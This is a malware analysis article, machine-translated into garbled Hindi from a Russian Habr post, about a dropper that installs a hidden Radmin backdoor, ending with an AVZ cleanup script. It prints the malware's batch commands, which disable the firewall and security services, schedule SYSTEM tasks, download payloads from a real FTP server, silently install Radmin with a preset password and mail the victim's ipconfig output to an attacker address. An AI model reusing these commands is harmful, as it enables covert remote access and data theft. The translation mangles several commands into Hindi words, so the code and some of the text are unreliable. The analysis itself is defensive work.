Geekly Articles each Day

рдЫрд┐рдкреЗ рд╣реБрдП рд░реЗрдбрдорд┐рди рдХреЗ рдЕрдЧрд▓реЗ рд╕рдВрд╕реНрдХрд░рдг рдХрд╛ рд╡рд┐рд╢реНрд▓реЗрд╖рдг

рдПрдХ рдирд┐рдЬреА рд╕рдВрджреЗрд╢ рдореЗрдВ рдПрдХ рдордВрдЪ рдкрд░ рдЖрдЬ рдлрд╝рд╛рдЗрд▓ рдХреА рдЬрд╛рдВрдЪ рдХрд░рдиреЗ рдХреЗ рдЕрдиреБрд░реЛрдз рдХреЗ рд╕рд╛рде рдкрд╛рд░рд┐рдд рд╣реБрдЖред рдореИрдВ рд╕рд╣рдордд рдерд╛, рд╣рд╛рд▓рд╛рдВрдХрд┐ рдЙрддреНрд╕реБрдХред рдШрдЯрдирд╛ рдХреЗ рдереЛрдбрд╝рд╛ рдЖрдЧреЗ рдФрд░ рдореИрдВ рдХрд╣реВрдВрдЧрд╛ рдХрд┐ рдпрд╣ рджреВрд╕рд░реА рд╢рд╛рдЦрд╛ рдХреЗ рд░реЗрдбрдорд┐рди рд╕реЗ рдирд┐рд░реНрдорд┐рдд рдПрдХ рдмреИрдХрдбреЛрд░ рд╣реИ рдФрд░ рдХреБрдЫ рдФрд░)
рдкреНрд░рд╛рдкреНрдд рдлрд╝рд╛рдЗрд▓: kak_ponyat_muzhchin_bibl.ru.exe (md5: 2138A224BDD1A36329F398A37E10AB9)
рдореИрдВ рдХреЗрд╡рд▓ рджреБрд░реНрднрд╛рд╡рдирд╛рдкреВрд░реНрдг рдлрд╝рд╛рдЗрд▓реЛрдВ рдХреЗ рд▓рд┐рдП рд░рд╛рд╢рд┐ рдХрд╛ рд╣реИрд╢ рдЗрдВрдЧрд┐рдд рдХрд░реВрдВрдЧрд╛ред
рд╕рд╛рдорд╛рдиреНрдп рддреМрд░ рдкрд░, рд╡рд░реНрдгрди рджреНрд╡рд╛рд░рд╛ - рдпрд╣ рдХрд┐рд╕реА рдкреНрд░рдХрд╛рд░ рдХреА рдкреБрд╕реНрддрдХ рд╣реИ, рдХреНрдпреЛрдВ рдирд┐рд░реНрд╡рд╛рд╕рди рдореЗрдВ - рдпрд╣ рд╕реНрдкрд╖реНрдЯ рдирд╣реАрдВ рд╣реИ, рд╣рдо рдЖрдЧреЗ рджреЗрдЦрддреЗ рд╣реИрдВред
рд╣рдо PEiD рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рддреЗ рд╣реИрдВ:

UPX 0.89.6 - 1.02 / 1.05 - 2.90 (рдбреЗрд▓реНрдлреА) рдареВрдВрда -> рдорд╛рд░реНрдХрд╕ рдФрд░ рд▓рд╛рд╕реНрдЬрд╝рд▓реЛ [RAR SFX]
рдЪрд▓реЛ рд╡рд╛рдЗрдирд░ рдХреЛ рдЕрдирдЬрд╝рд┐рдк рдХрд░рдиреЗ рдХреА рдХреЛрд╢рд┐рд╢ рдХрд░рддреЗ рд╣реИрдВ, рд╣рдореЗрдВ рджреЛ рдлрд╛рдЗрд▓реЗрдВ рдорд┐рд▓рддреА рд╣реИрдВ:

filip_olegovich.exe
рдФрд░ setup.exe (md5: C888FCE716D600EE53D467F7DF2B2475)



рджреЛрдиреЛрдВ рдХреЛ рдЕрдкреИрдХреНрд╕ рдореЗрдВ рдкреИрдХ рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИ, рдЕрдирдкреИрдХ рдХрд░рдиреЗ рдХреЗ рдмрд╛рдж рд╣рдореЗрдВ рдирд┐рдореНрди рдЪрд┐рддреНрд░ рдорд┐рд▓рддреЗ рд╣реИрдВ:



filip_olegovich.exe - exe рдореЗрдВ рд╕рдВрдХрд▓рд┐рдд pdf-file, рдпрд╣ рдЕрдм рд╣рдореЗрдВ рд░реБрдЪрддреА рдирд╣реАрдВ рд╣реИред
setup.exe (md5: 732FCAA243C007DAA9354AEAF3F6D572) рдПрдХ PureBasic 4.x -> рдиреАрд▓ рд╣реЙрдЬрд╕рди * рдХрдВрдкрд╛рдЗрд▓рд░ рд╣реИ , рдЬреЛ рдПрдЧреНрдЬреАрдХреНрдпреВрдЯрд┐рд╡ рдХреЗ рд▓рд┐рдП рдмреИрдЯ рдлрд╝рд╛рдЗрд▓реЛрдВ рдХреЛ рдХрдирд╡рд░реНрдЯ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рд╡рд┐рд╢рд┐рд╖реНрдЯ рд╣реИред

рдЬрдмрдХрд┐ рд╕рдВрджрд┐рдЧреНрдз рдлрд╝рд╛рдЗрд▓ рдХреЗ рджреЛрдиреЛрдВ рд╕рдВрд╕реНрдХрд░рдг рд╡рд╛рдпрд░рд╕ рдореЗрдВ рдбрд╛рдЙрдирд▓реЛрдб рдХрд┐рдП рдЧрдП рд╣реИрдВ, рд╣рдо рдЕрдирдкреИрдХреНрдб setup.exe рдХреЗ рд╕рдВрд╕рд╛рдзрдиреЛрдВ рдХреЛ рджреЗрдЦреЗрдВрдЧреЗ:



рд╣рд╛рдВ, рдпрд╣ рдПрдХ рдкрд░рд┐рд╡рд░реНрддрд┐рдд рдмреИрдЪ рдлрд╝рд╛рдЗрд▓ рд╣реИ рдЬреЛ 2 рдлрд╝рд╛рдЗрд▓реЛрдВ рдХреЛ рдмрдирд╛рдПрдЧреА рдФрд░ рдЕрдкрдиреЗ рд╕реНрд╡рдпрдВ рдХреЗ рдмреИрдЯ рдХреЛрдб рдХреЛ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░реЗрдЧреА:
sc config рдЕрдиреБрд╕реВрдЪреА рдкреНрд░рд╛рд░рдВрдн = рдСрдЯреЛ
sc рд╕реНрдЯрд╛рд░реНрдЯ рд╢реЗрдбреНрдпреВрд▓

sc config wscsvc рдкреНрд░рд╛рд░рдВрдн = рдЕрдХреНрд╖рдо
sc config рд╕рд╛рдЭрд╛рдХрд░рдг рдкреНрд░рд╛рд░рдВрдн = рдЕрдХреНрд╖рдо рдХрд┐рдпрд╛ рдЧрдпрд╛

sc рд╕реНрдЯреЙрдк wscsvc
sc рдмрдВрдж рдХрд░реЛ

schtasks / create / tn "f" / sc minute / mo 1 / ru "NT AUTHORITY \ SYSTEM" / tr% systemroot% / ff.bat

attrib + h% systemroot% / рдХрд╛рд░реНрдпреЛрдВ /*.* netsh advfirewall рдиреЗ рд╡рд░реНрддрдорд╛рди рд▓рд╛рднрдХрд╛рд░реА рд╕реНрдерд┐рддрд┐ рдХреЛ рдмрдВрдж рдХрд░ рджрд┐рдпрд╛
C: /isendms_setup.exe

рдпрд╣ рдмреИрдЪ рдлрд╝рд╛рдЗрд▓ рдХрд╛рд░реНрдп рд╢реЗрдбреНрдпреВрд▓рд░ рд╕реЗрд╡рд╛ рд╢реБрд░реВ рдХрд░реЗрдЧреА, рд╕реЗрд╡рд╛рдУрдВ "рд╕реБрд░рдХреНрд╖рд╛ рдХреЗрдВрджреНрд░ рдФрд░ рд╕реБрд░рдХреНрд╖рд╛ рдЕрд▓рд░реНрдЯ" рдФрд░ "рд╡рд┐рдВрдбреЛрдЬрд╝ рдлрд╝рд╛рдпрд░рд╡реЙрд▓" рдХреЛ рд░реЛрдХреЗрдВ ред рдЗрд╕рдХреЗ рдмрд╛рдж, рдХрд╛рд░реНрдп рдХреЛ рд╢реЗрдбреНрдпреВрд▓рд░ рдореЗрдВ рдЬреЛрдбрд╝реЗрдВ, рдЬреЛ рд╣рд░ рдорд┐рдирдЯ рдореЗрдВ ff.bat рдлрд╝рд╛рдЗрд▓ рдЪрд▓рд╛рдПрдЧрд╛ , рдХрд╛рд░реНрдп рдлрд╝рд╛рдЗрд▓ рдХреЛ рдЫрд┐рдкрд╛рдПрдЧрд╛ рдФрд░ рдлрд╝рд╛рдпрд░рд╡реЙрд▓ рдХреЛ рдлрд┐рд░ рд╕реЗ рдмрдВрдж рдХрд░ рджреЗрдЧрд╛ред рдПрдХ рдбреЗрд╡рд▓рдкрд░ рдпрд╛ рдкрд╛рдЧрд▓ рдпрд╛ рд╢реМрдХрд┐рдпрд╛, рдмрд▓реНрдХрд┐, рджреВрд╕рд░рд╛ред рд╕реАрдзреЗ рд╢рдмреНрджреЛрдВ рдореЗрдВ рдХрд╣реЗрдВ, рдпрд╣ setup.exe рдлрд╝рд╛рдЗрд▓ рдЯреНрд░реЛрдЬрди-рдбрд╛рдЙрдирд▓реЛрдбрд░ рдХрд╛ рдПрдХ рдЙрджрд╛рд╣рд░рдг рд╣реИ, рдмрд╕ рдереЛрдбрд╝рд╛ рд╕реБрдзрд╛рд░ рд╣реБрдЖ рд╣реИред рдЕрдЧрд▓рд╛, рдЙрдкрд░реЛрдХреНрдд рджреЛ рдлрд╛рдЗрд▓реЛрдВ рдкрд░ рд╡рд┐рдЪрд╛рд░ рдХрд░реЗрдВ: рдпрд╣ рдкрд╛рда % systemroot% / system.bin рдкрд░ рдХреЙрдкреА рдХрд┐рдпрд╛ рдЬрд╛рдПрдЧрд╛
u11631
javasc
f.bat рдкреНрд░рд╛рдкреНрдд рдХрд░реЗрдВ
del check.txt
рдирдорд╕реНрддреЗ

рдФрд░% systemroot% / ff.bat рдореЗрдВ рдРрд╕рд╛ рдХреЛрдб
sc config wscsvc рдкреНрд░рд╛рд░рдВрдн = рдЕрдХреНрд╖рдо
sc config рд╕рд╛рдЭрд╛рдХрд░рдг рдкреНрд░рд╛рд░рдВрдн = рдЕрдХреНрд╖рдо рдХрд┐рдпрд╛ рдЧрдпрд╛
sc stop wscsvc sc stop SharedAccess
ftp -s: C: \ WINDOWS / system.bin ftp.on.ufanet.ru f.bat

% systemroot% - рд╡рд┐рдВрдбреЛрдЬрд╝ рдлрд╝реЛрд▓реНрдбрд░, рдореЗрд░реЗ рдорд╛рдорд▓реЗ рдореЗрдВ C: \ windows

рдпрд╣ рд╣рдореЗрдВ рдХреНрдпрд╛ рдмрддрд╛ рд╕рдХрддрд╛ рд╣реИ?
рд╕рдмрд╕реЗ рдкрд╣рд▓реЗ, system.bin рдлрд╝рд╛рдЗрд▓ ftp рдХреНрд▓рд╛рдЗрдВрдЯ рдХреЗ рд▓рд┐рдП рдПрдХ рдХреЙрдиреНрдлрд╝рд┐рдЧрд░реЗрд╢рди рд╣реИ рдЬреЛ рд╕рд░реНрд╡рд░ рдкрд░ рдЬрд╛рдПрдЧреА рдФрд░ рдПрдХ рд╡рд┐рд╢рд┐рд╖реНрдЯ рдлрд╝рд╛рдЗрд▓ рдбрд╛рдЙрдирд▓реЛрдб рдХрд░реЗрдЧреАред (рдмрджрд▓реЗ рдореЗрдВ рд▓рд╛рдЗрдиреЗрдВ: рд╕рд░реНрд╡рд░ рд▓реЙрдЧрд┐рди, рдкрд╛рд╕рд╡рд░реНрдб, рд╕рд░реНрд╡рд░ рд╕реЗ рдлрд╝рд╛рдЗрд▓ рдбрд╛рдЙрдирд▓реЛрдб рдХрд░рдирд╛, рд╕рд░реНрд╡рд░ рдкрд░ рдлрд╝рд╛рдЗрд▓ рд╣рдЯрд╛рдирд╛, ftp рд╕рддреНрд░ рд╕рдорд╛рдкреНрдд рдХрд░рдирд╛)
Ff.bat рдлрд╝рд╛рдЗрд▓ рдХреНрдпрд╛ рдХрд░рддреА рд╣реИ ? рд╕рдмрд╕реЗ рдкрд╣рд▓реЗ, рдпрд╣ рд╕реНрдЯрд╛рд░реНрдЯрдЕрдк рд╕реЗ рджреЛ рд╕реЗрд╡рд╛рдУрдВ рдХреЛ рд░реЛрдХрддрд╛ рд╣реИ рдФрд░ рд╣рдЯрд╛рддрд╛ рд╣реИ: wscsvc - рд╕реБрд░рдХреНрд╖рд╛ рдХреЗрдВрджреНрд░ рдФрд░ рд╕реБрд░рдХреНрд╖рд╛ рдЕрд▓рд░реНрдЯ
SharedAccess - windows рдлрд╝рд╛рдпрд░рд╡реЙрд▓ рдпрд╣ рдЕрдВрддрд░реНрдирд┐рд╣рд┐рдд рдлрд╝рд╛рдпрд░рд╡реЙрд▓ рдХреЛ рдЖрдЧреЗ рдиреЗрдЯрд╡рд░реНрдХ рдЧрддрд┐рд╡рд┐рдзрд┐ рдХреЛ рдмреНрд▓реЙрдХ рдХрд░рдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рдирд╣реАрдВ рджреЗрддрд╛ рд╣реИ, рд╕рд╛рде рд╣реА рд╕рд┐рд╕реНрдЯрдо рдореЗрдВ рд╕реБрд░рдХреНрд╖рд╛ рдХрдордЬреЛрд░рд┐рдпреЛрдВ рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рдЕрд▓рд░реНрдЯ рднреА рдмреНрд▓реЙрдХ рдХрд░рддрд╛ рд╣реИред
рдлрд┐рд░ рдпрд╣ system.bin рдлрд╝рд╛рдЗрд▓ рд╕реЗ рдЯрд┐рдВрдЪрд░ рдХреЗ рд╕рд╛рде ftp рд╕рд░реНрд╡рд░ ftp.on.ufanet.ru рд╕реЗ рдХрдиреЗрдХреНрд╢рди рдмрдврд╝рд╛рддрд╛ рд╣реИред Ftp рд╕рддреНрд░ рд╕рдорд╛рдкреНрдд рд╣реЛрдиреЗ рдХреЗ рдмрд╛рдж, рдпрд╣ f.ftp рдлрд╝рд╛рдЗрд▓ рдХреЛ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░реЗрдЧрд╛, рдЬреЛ рдирд┐рд░реНрджрд┐рд╖реНрдЯ рд╕рд░реНрд╡рд░ рд╕реЗ рдбрд╛рдЙрдирд▓реЛрдб рд╣реЛрдЧрд╛ред
рд╣рдорд╛рд░реЗ setup.exe рдлрд╝рд╛рдЗрд▓реЗрдВ, рд╡реИрд╕реЗ, рдкрд╣рд▓реЗ рд╕реЗ рд╣реА virustotal рдкрд░ рд╡рд┐рд╢реНрд▓реЗрд╖рдг рдХрд┐рдпрд╛ рдЧрдпрд╛ рд╣реИ:

рдЕрдЧрд▓рд╛, рд╣рдореЗрдВ рдЙрди рдлрд╝рд╛рдЗрд▓реЛрдВ рдХреЛ рдкреНрд░рд╛рдкреНрдд рдХрд░рдиреЗ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реИ рдЬрд┐рдиреНрд╣реЗрдВ ftp рд╕реЗ рдбрд╛рдЙрдирд▓реЛрдб рдХрд┐рдпрд╛ рдЬрд╛рдирд╛ рдерд╛, рдЗрд╕рдХреЗ рд▓рд┐рдП рд╣рдо рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдирд╛рдо рдФрд░ рдкрд╛рд╕рд╡рд░реНрдб рд▓реЗрддреЗ рд╣реИрдВ рдФрд░ рд╕реНрд╡рддрдВрддреНрд░ рд░реВрдк рд╕реЗ рдХрдиреЗрдХреНрдЯ рдХрд░рддреЗ рд╣реИрдВ:
f.bat
system.exe (md5: 1ADEF54E08294BC7548C91C8F6CF2032) - RAR SFX рд╕рдВрдЧреНрд░рд╣ рдирд┐рдореНрди рдЯрд┐рдкреНрдкрдгреА рдХреЗ рд╕рд╛рде:
  рдкрде =% SYSTEMROOT% / рдорджрдж / win32
 рдореМрди = рез
 рдЕрдзрд┐рд▓реЗрдЦрд┐рдд рд╣реЛрдирд╛ = рез
 setup = install.bat

рдпрд╣ рд╡рд┐рдХрд▓реНрдк рдЪреБрдкрдЪрд╛рдк рдореЛрдб рдореЗрдВ % SYSTEMROOT% / рдорджрдж / win32 рдореЗрдВ рд╕рдВрдЧреНрд░рд╣ рдХреА рд╕рд╛рдордЧреНрд░реА рдХреЛ рдЦреЛрд▓ рджреЗрддрд╛ рд╣реИ



рдПрдХ рд╣реА рдлреНрд░реЗрдо рдХреЗ рд╕рд╛рде рдЕрдирдкреИрдХ рдХрд░рдиреЗ рдХреЗ рдмрд╛рдж, рд╣рдореЗрдВ рджреВрд╕рд░реЗ рд╕рдВрд╕реНрдХрд░рдг рдХреЗ рдЫрд┐рдкреЗ рд╣реБрдП рд░реЗрдбрдорд┐рди рдХреА рдПрдХ рдЕрд╕реЗрдВрдмрд▓реА рд╕реЗ рдЬреНрдпрд╛рджрд╛ рдХреБрдЫ рдирд╣реАрдВ рдорд┐рд▓рддрд╛ рд╣реИ: raddrv.dll рдФрд░ admdll.dll - рд░реЗрдбрдорд┐рди 2 рдбреНрд░рд╛рдЗрд╡рд░

svchost.exe - рд░реЗрдбрдорд┐рди 2 рдирд┐рд╖реНрдкрд╛рджрди рдпреЛрдЧреНрдп рдлрд╝рд╛рдЗрд▓

рдмреНрд▓рдЯред * - рдмреНрд▓рдЯ рдХрдВрд╕реЛрд▓ рдореЗрд▓ рдХреНрд▓рд╛рдЗрдВрдЯ рдХреЗ рд╕реНрд╡рд╛рдорд┐рддреНрд╡ рд╡рд╛рд▓реА рдлрд╛рдЗрд▓реЗрдВ

рд▓реЗрдХрд┐рди рд╣рдо рдЗрди рдлрд╝рд╛рдЗрд▓реЛрдВ рдкрд░ рдЕрдзрд┐рдХ рд╡рд┐рд╕реНрддрд╛рд░ рд╕реЗ рд╡рд┐рдЪрд╛рд░ рдХрд░реЗрдВрдЧреЗ: install.bat
@ рддреЛ рдмрдВрдж

sc config wscsvc рдкреНрд░рд╛рд░рдВрдн = рдЕрдХреНрд╖рдо
sc рд╕реНрдЯреЙрдк wscsvc

sc config рд╕рд╛рдЭрд╛рдХрд░рдг рдкреНрд░рд╛рд░рдВрдн = рдЕрдХреНрд╖рдо рдХрд┐рдпрд╛ рдЧрдпрд╛
sc рдмрдВрдж рдХрд░реЛ

sc config рдЕрдиреБрд╕реВрдЪреА рдкреНрд░рд╛рд░рдВрдн = рдСрдЯреЛ
sc рд╕реНрдЯрд╛рд░реНрдЯ рд╢реЗрдбреНрдпреВрд▓
svchost.exe / рд╕реНрдерд╛рдкрд┐рдд / рдореМрди
svchost.exe / pass: 12345678125 / рд╕рд╣реЗрдЬреЗрдВ / рдореМрди
REG ADD HKLM \ SYSTEM \ RAdmin \ v2.0 \ Server \ Parameters / v DisableTrayIcon / t REG_BINARY / d 00000001 / f
REG ADD HKLM \ SYSTEM \ CurrentControlSet \ Services \ r_server / v DisplayName / t REG_SZ / d "рд╕реЗрд╡рд╛ рд╣реЛрд╕реНрдЯ рдирд┐рдпрдВрддреНрд░рдХ" / f
svchost.exe / stop
svchost.exe / start
blat.exe-рд╕реНрдерд╛рдкрдирд╛ -server smtp.yandex.ru -port 587 -f ufanetcom2@yandex.ru -u ufanetcom2 -pw javascriptsc
schtasks / create / tn "security" / sc рдорд┐рдирдЯ / mo 15 / ru "NT AUTHORITY \ SYSTEM" / tr% SYSTEMROOT% / рдорджрдж / win32 / microsoft.bat
рдЕрдЯреНрд░рд┐рдм + рдПрдЪ% рд╕рд┐рд╕реНрдЯрдорд░реЛрдЯ% / рдХрд╛рд░реНрдп /*.*
рдирд┐рдХрд╛рд╕

рд╣рдо рдЖрджреЗрд╢реЛрдВ рдХрд╛ рд╡рд┐рд╢реНрд▓реЗрд╖рдг рдХрд░реЗрдВрдЧреЗред рд╕рдмрд╕реЗ рдкрд╣рд▓реЗ, рдлрд╝рд╛рдпрд░рд╡реЙрд▓ рдФрд░ рд╕реБрд░рдХреНрд╖рд╛ рдЕрд▓рд░реНрдЯ рдХрд╛ рдЕрдЧрд▓рд╛ рд╢рдЯрдбрд╛рдЙрди, рдлрд┐рд░ рдХрд╛рд░реНрдп рд╢реЗрдбреНрдпреВрд▓рд░ рд╕реЗрд╡рд╛ рдХреЛ рдкреБрдирд░рд╛рд░рдВрдн рдХрд░рдирд╛ред рдЕрдЧрд▓рд╛ - рд╕рдмрд╕реЗ рд╕реНрд╡рд╛рджрд┐рд╖реНрдЯ, рдореВрдХ рдЗрдВрд╕реНрдЯреЙрд▓реЗрд╢рди, рдПрдХ рдкреВрд░реНрд╡рдирд┐рд░реНрдзрд╛рд░рд┐рдд рдкрд╛рд╕рд╡рд░реНрдб, рд╕рд╛рде рд╣реА рд░рдЬрд┐рд╕реНрдЯреНрд░реА рдХреЗ рд▓рд┐рдП рдкреАрдбрд╝рд┐рдд рдХреЗ рдЯреНрд░реЗ рдЖрдЗрдХрди рдХреЛ рдЫрд┐рдкрд╛рдиреЗ рдХреЗ рд▓рд┐рдП рд╕реЗрдЯрд┐рдВрдЧреНрд╕ рд▓рд┐рдЦрдиреЗ рд╡рд╛рд▓реЗ рдорд╛рдкрджрдВрдбреЛрдВ рдХреЗ рд╕рд╛рде рд░реЗрдбрдорд┐рди рд╕рд░реНрд╡рд░ рдХрд╛ рд╢реБрднрд╛рд░рдВрднред рджреВрд╕рд░реА рдХреБрдВрдЬреА рд░реЗрдбрдорд┐рди рд╕реЗрд╡рд╛ рдирд╛рдо - рд╕реЗрд╡рд╛ рд╣реЛрд╕реНрдЯ рдирд┐рдпрдВрддреНрд░рдХ рд╕реЗрдЯ рдХрд░реЗрдЧреА

рдЦреИрд░, рдЕрдВрдд рд╕реЗрд╡рд╛ рдХрд╛ рд╢реБрднрд╛рд░рдВрдн рд╣реИред рдЗрд╕ рдкреНрд░рдХрд╛рд░, рд░реЗрдбрдорд┐рди рдПрдХ рдкреВрд░реНрд╡рдирд┐рд░реНрдзрд╛рд░рд┐рдд рдкрд╛рд╕рд╡рд░реНрдб рдФрд░ рд╕рднреА рд╕рдВрднрд╡ рдЫрд┐рдкрд╛рд╡ рдХреЗ рд╕рд╛рде рд╕рдордЭреМрддрд╛ рдкреНрд░рдгрд╛рд▓реА рдкрд░ рд╕реНрдерд╛рдкрд┐рдд рд╣реИред рдЗрд╕рдХреЗ рдмрд╛рдж, рд╣рдо рдмреНрд▓рдЯ рдореЗрд▓ рдХреНрд▓рд╛рдЗрдВрдЯ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдореЗрд▓ рднреЗрдЬрдиреЗ рдФрд░ рдЯрд╛рд╕реНрдХ рд╢реЗрдбреНрдпреВрд▓рд░ рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рд╕реНрдЯрд╛рд░реНрдЯрдЕрдк рдХреЗ рд▓рд┐рдП рдЗрд╕ рд╕рднреА рдмреИрдЯ рдлрд╛рдЗрд▓ рдХреЛ рд╕реНрдЯрд╛рд░реНрдЯрдЕрдк рдореЗрдВ рдЬреЛрдбрд╝рдиреЗ рдХреЗ рд▓рд┐рдП рдбреЗрдЯрд╛ рд░рдЬрд┐рд╕реНрдЯреНрд░реА рдореЗрдВ рдПрдХ рд░рд┐рдХреЙрд░реНрдб рджреЗрдЦрддреЗ рд╣реИрдВред microsoft.bat
sc config рд╕рд╛рдЭрд╛рдХрд░рдг рдкреНрд░рд╛рд░рдВрдн = рдЕрдХреНрд╖рдо рдХрд┐рдпрд╛ рдЧрдпрд╛
sc рдмрдВрдж рдХрд░реЛ
ipconfig /all>%SYSTEMROOT%\Help\win32/ip.txt
% SYSTEMROOT% / help / win32 / blat.exe% systemroot% / help / win32 / ip.txt -to ufanetcom2@yandex.ruред рдирд┐рдХрд╛рд╕

рджреВрд╕рд░рд╛ рдмреИрдЪ рдлрд╝рд╛рдЗрд▓ рдПрдХ рдмрд╛рд░ рдлрд┐рд░ рд╕рд┐рд╕реНрдЯрдо рдлрд╝рд╛рдпрд░рд╡реЙрд▓ рдХреЛ рдбрд┐рд╕реНрдХрдиреЗрдХреНрдЯ рдХрд░рддрд╛ рд╣реИ, рдФрд░ рдЖрдЙрдЯрдкреБрдЯ рдХреЛ рдЯреЗрдХреНрд╕реНрдЯ рдлрд╝рд╛рдЗрд▓ рдореЗрдВ рд╕рд╣реЗрдЬрдиреЗ рдХреЗ рд╕рд╛рде ipconfig / рд╕рднреА рдХрдорд╛рдВрдб рдХреЛ рднреА рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░рддрд╛ рд╣реИ, рдЬрд┐рд╕реЗ рдмрд╛рдж рдореЗрдВ ufanetcom2@yandex.ru рдкрд░ рдмреНрд▓рдЯ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рднреЗрдЬрд╛ рдЬрд╛рдПрдЧрд╛, рд╕рдВрдХреНрд╖реЗрдк рдореЗрдВ, рдпрд╣ рдПрдХ рд╣рдорд▓рд╛рд╡рд░ рдХреЛ рдХрдиреЗрдХреНрдЯ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдПрдХ рдЖрдИрдкреА рдкрддрд╛ рднреЗрдЬреЗрдЧрд╛ рдПрдХ рд╕рдВрдХреНрд░рдорд┐рдд рдХрд╛рд░ рдХреЗ рд▓рд┐рдПред

рдЗрд╕ рдкрд░, рд╕рд╛рдорд╛рдиреНрдп рддреМрд░ рдкрд░, рд╕рдм рдХреБрдЫ, рд╡рд┐рд╢реНрд▓реЗрд╖рдг рдкреВрд░рд╛ рд╣реЛ рдЧрдпрд╛ рд╣реИред рд╡рд┐рд╢реНрд▓реЗрд╖рдг рдкреВрд░реА рддрд░рд╣ рд╕реЗ рд╕реНрдерд┐рд░ рд╣реИ, рдЖрдкрдХреЛ рдПрдХ рдЖрднрд╛рд╕реА рд╡рд╛рддрд╛рд╡рд░рдг рдореЗрдВ рдХреБрдЫ рднреА рдЪрд▓рд╛рдиреЗ рдХреА рдЬрд╝рд░реВрд░рдд рдирд╣реАрдВ рдереА, рд╕рдм рдХреБрдЫ рдХреЙрд░реНрдиреА рд╣реИред рдлрд┐рд░ рднреА, рдореИрдВрдиреЗ рдореЗрд▓ рдкрд░ рдЬрд╛рдХрд░ рдкреАрдбрд╝рд┐рддреЛрдВ рдХреЗ рдЖрдИрдкреА рдкрддреЗ рдХреЗ рд╕рд╛рде рдмрдбрд╝реА рд╕рдВрдЦреНрдпрд╛ рдореЗрдВ рдкрддреНрд░ рджреЗрдЦреЗред рд╕рд┐рд╕реНрдЯрдо рдХреЛ рдареАрдХ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдиреАрдЪреЗ AVZ рд╕реНрдХреНрд░рд┐рдкреНрдЯ рд╣реИред
  рд╢реБрд░реВ рдХрд░рдирд╛
 SearchRootkit (рд╕рдЪреНрдЪрд╛, рд╕рдЪреНрдЪрд╛);
 рд╕реЗрдЯрд╡реЗрдЬрд╝рдЧрд╛рд░реНрдбрд╕реНрдЯреИрдЯрд╕ (рдЯреНрд░реВ);
 StopService ('r_server');
 DeleteService ('r_server', true);
 TerminateProcessByName ('c: \ windows \ help \ win32 \ svchost.exe');
 DeleteFile ('C: \ WINDOWS \ ff.bat');
 DeleteFile ('C: \ WINDOWS \ SYSTEM.DLL');
 DeleteFileMask ('C: \ WINDOWS \ help \ win32', '*ред *', True);
 BC_ImportAll;
 ExecuteSysClean;
 ExecuteWizard ('TSW', 2,3, рд╕рдЪ);
 BC_Activate;
 рд░рд┐рдмреВрдЯрд╡реЙрдЪ (рд╕рдЪ);
 рдЕрдВрддред

Source: https://habr.com/ru/post/In123752/

More articles:


All Articles